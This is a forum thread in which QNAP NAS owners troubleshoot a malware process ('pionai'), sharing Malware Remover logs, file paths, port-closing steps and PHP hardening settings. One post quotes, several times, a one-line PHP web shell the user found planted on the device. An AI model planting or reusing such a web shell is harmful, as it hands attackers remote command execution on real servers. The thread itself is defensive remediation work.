Unknown Thread kthreaddnai
-
- Starting out
- Posts: 11
- Joined: Wed Mar 28, 2018 8:45 am
Re: Unknown Thread kthreaddnai
Both Gitea and Nextcloud are exposed througth ContainerStation
-
- First post
- Posts: 1
- Joined: Fri Sep 28, 2018 3:01 pm
Re: Unknown Thread kthreaddnai
I encountered the same problem a few days ago.
I have no idea where this process originates from or what is does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.
After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan every day at 03:00AM my system to keep it clean.
I have no idea where this process originates from or what is does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.
App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.
After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan every day at 03:00AM my system to keep it clean.
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
Re: Unknown Thread kthreaddnai
The malware remover ran for me and did not find anything. After the restart, no process was visible for 2 hours. The process came back overnight. QNAP Support has not commented yet.
- OneCD
- Guru
- Posts: 12039
- Joined: Sun Aug 21, 2016 10:48 am
- Location: "... there, behind that sofa!"
Re: Unknown Thread kthreaddnai
Is any part of your NAS exposed to the Internet?
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
-
- First post
- Posts: 1
- Joined: Tue Jun 05, 2012 3:10 pm
Re: Unknown Thread kthreaddnai
I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone call it from internet.
So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On
Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On
Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
Re: Unknown Thread kthreaddnai
What are these settings?cufiler wrote: ↑Thu Nov 15, 2018 6:13 pm I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone call it from internet.
So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On
Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
I have already deleted the folder pionai under / tmp /. Also, I closed port 80. I have not yet made the settings in the INI data.
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
-
- New here
- Posts: 6
- Joined: Thu May 05, 2016 2:57 am
Re: Unknown Thread kthreaddnai
I have the same critter in my TS-251.
I chased all size 37472 files (god, init, eth1, etc).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php
good luck
I chased all size 37472 files (god, init, eth1, etc).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php
good luck
- Trexx
- Ask me anything
- Posts: 5393
- Joined: Sat Oct 01, 2011 7:50 am
- Location: Minnesota
Re: Unknown Thread kthreaddnai
You might try using the new malware remover to see if that cleans it better. BUT that is NOT going to prevent infection (it doesn't run real-time), it only removes it. The only way to 100% prevent infection is not to expose your NAS to the internet. A full featured IPS/IDS platform / reverse proxies/etc. can help mitigate risk as well.
Paul
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline[/color]
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
- dolbyman
- Guru
- Posts: 35024
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Unknown Thread kthreaddnai
and all please open tickets with qnap so they can investigate+improve malware removal
-
- Starting out
- Posts: 11
- Joined: Wed Mar 28, 2018 8:45 am
Re: Unknown Thread kthreaddnai
Hello !
I completely reinstall my Nas on the last days (data backup + full disk format on another PC).
All was OK until I reinstall yesterday CodexPack and PhotoStation so i suspect it's coming from one of them..
Still investigating...
I completely reinstall my Nas on the last days (data backup + full disk format on another PC).
All was OK until I reinstall yesterday CodexPack and PhotoStation so i suspect it's coming from one of them..
Still investigating...
-
- New here
- Posts: 7
- Joined: Wed Jul 13, 2016 3:46 pm
Re: Unknown Thread kthreaddnai
To close Port 80 has temporarily brought peace first. QNAP still has not processed my ticket.
-
- Getting the hang of things
- Posts: 62
- Joined: Thu Jun 03, 2010 5:16 am
Re: Unknown Thread kthreaddnai
any luck getting rid of it? im having same issues
-
- Starting out
- Posts: 31
- Joined: Thu May 07, 2009 9:58 pm
Re: Unknown Thread kthreaddnai
I had the 'pionai' process running and raised a helpdesk ticket.
I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152
It worked for me
I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152
It worked for me
QNAP TVS1282 (PRD box)
V4.5.1.1540
8x Seagate 8TB Ironwolf (2x RAID 5 Storage Pools)
4x 1TB Crucial SSD (2x RAID1 Storage Pools)
2x 500GB Samsung PCIe RAID 0 R/W Cache
QNAP TS670 Pro (DEV/Backup box)
V4.3.7.(latest) EOL
6x Seagate 8TB Ironwolf RAID 5
Riello VSD 1500 UPS
V4.5.1.1540
8x Seagate 8TB Ironwolf (2x RAID 5 Storage Pools)
4x 1TB Crucial SSD (2x RAID1 Storage Pools)
2x 500GB Samsung PCIe RAID 0 R/W Cache
QNAP TS670 Pro (DEV/Backup box)
V4.3.7.(latest) EOL
6x Seagate 8TB Ironwolf RAID 5
Riello VSD 1500 UPS